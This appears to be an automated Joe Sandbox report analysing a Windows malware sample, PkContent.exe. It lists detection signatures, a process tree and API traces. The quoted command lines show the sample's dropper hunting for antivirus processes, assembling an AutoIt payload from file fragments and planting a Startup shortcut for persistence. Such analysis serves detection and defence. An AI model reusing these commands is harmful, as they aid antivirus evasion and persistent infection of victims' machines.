Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PkContent.exe

Overview

General Information

Sample name:PkContent.exe
Analysis ID:1577543
MD5:87c051a77edc0cc77a4d791ef72367d1
SHA1:5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
SHA256:b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
Tags:18521511316185215113209bulletproofexenjratuser-abus3reports
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • PkContent.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\PkContent.exe" MD5: 87C051A77EDC0CC77A4D791EF72367D1)
    • cmd.exe (PID: 2628 cmdline: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5440 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6812 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6328 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2024 cmdline: cmd /c md 724598 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5912 cmdline: findstr /V "WowLiberalCalOfficer" Weight MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1352 cmdline: cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Thermal.pif (PID: 1648 cmdline: Thermal.pif y MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5732 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 6960 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1920 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HermesKey.scr (PID: 2196 cmdline: "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , ProcessId: 1920, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Thermal.pif y, CommandLine: Thermal.pif y, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2628, ParentProcessName: cmd.exe, ProcessCommandLine: Thermal.pif y, ProcessId: 1648, ProcessName: Thermal.pif
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 1648, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 1648, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , ProcessId: 1920, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2628, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 6328, ProcessName: findstr.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PkContent.exeAvira: detected
Source: PkContent.exeReversingLabs: Detection: 63%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
Source: PkContent.exeJoe Sandbox ML: detected
Source: PkContent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PkContent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00184005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00184005
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018494A GetFileAttributesW,FindFirstFileW,FindClose,12_2_0018494A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00183CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00183CE2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0018C2FF
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018CD14 FindFirstFileW,FindClose,12_2_0018CD14
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_0018CD9F
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0018F5D8
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0018F735
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0018FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0018FA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00074005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00074005
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0007494A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0007C2FF
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007CD14 FindFirstFileW,FindClose,18_2_0007CD14
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0007CD9F
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0007F5D8
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0007F735
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0007FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0007FA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00073CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00073CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\724598\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\724598Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001929BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,12_2_001929BA
Source: global trafficDNS traffic detected: DNS query: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PkContent.exe, 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: PkContent.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: PkContent.exe, 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp, HermesKey.scr, 00000012.00000000.1496285640.00000000000D9000.00000002.00000001.01000000.0000000A.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: HermesKey.scr.12.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: PkContent.exe, 00000000.00000003.1312253060.0000000002754000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000003.1368352365.0000000003D0A000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000C.00000002.2556840478.0000000001472000.00000004.00000020.00020000.00000000.sdmp, Ought.0.dr, Thermal.pif.3.dr, HermesKey.scr.12.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00194830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_00194830
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00084830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,18_2_00084830
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00194632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00194632
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001AD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_001AD164
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_0009D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,18_2_0009D164

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00184254: CreateFileW,DeviceIoControl,CloseHandle,12_2_00184254
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00178F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,12_2_00178F2E
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00185778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,12_2_00185778
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 18_2_00075778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,18_2_00075778
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\PgJuneJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\ReceptorsTeethJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\PorcelainExhaustJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\MonsterRaymondJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\FirewireBrosJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\PortugalChargesJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0012B02012_2_0012B020
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001294E012_2_001294E0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00129C8012_2_00129C80
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001423F512_2_001423F5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001A840012_2_001A8400
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0015650212_2_00156502
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0015265E12_2_0015265E
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0012E6F012_2_0012E6F0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014282A12_2_0014282A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001589BF12_2_001589BF
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001A0A3A12_2_001A0A3A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00156A7412_2_00156A74
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00130BE012_2_00130BE0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014CD5112_2_0014CD51
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0017EDB212_2_0017EDB2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00188E4412_2_00188E44
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001A0EB712_2_001A0EB7
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_00156FE612_2_00156FE6
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_001433B712_2_001433B7
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 12_2_0014F40912_2_0014F409
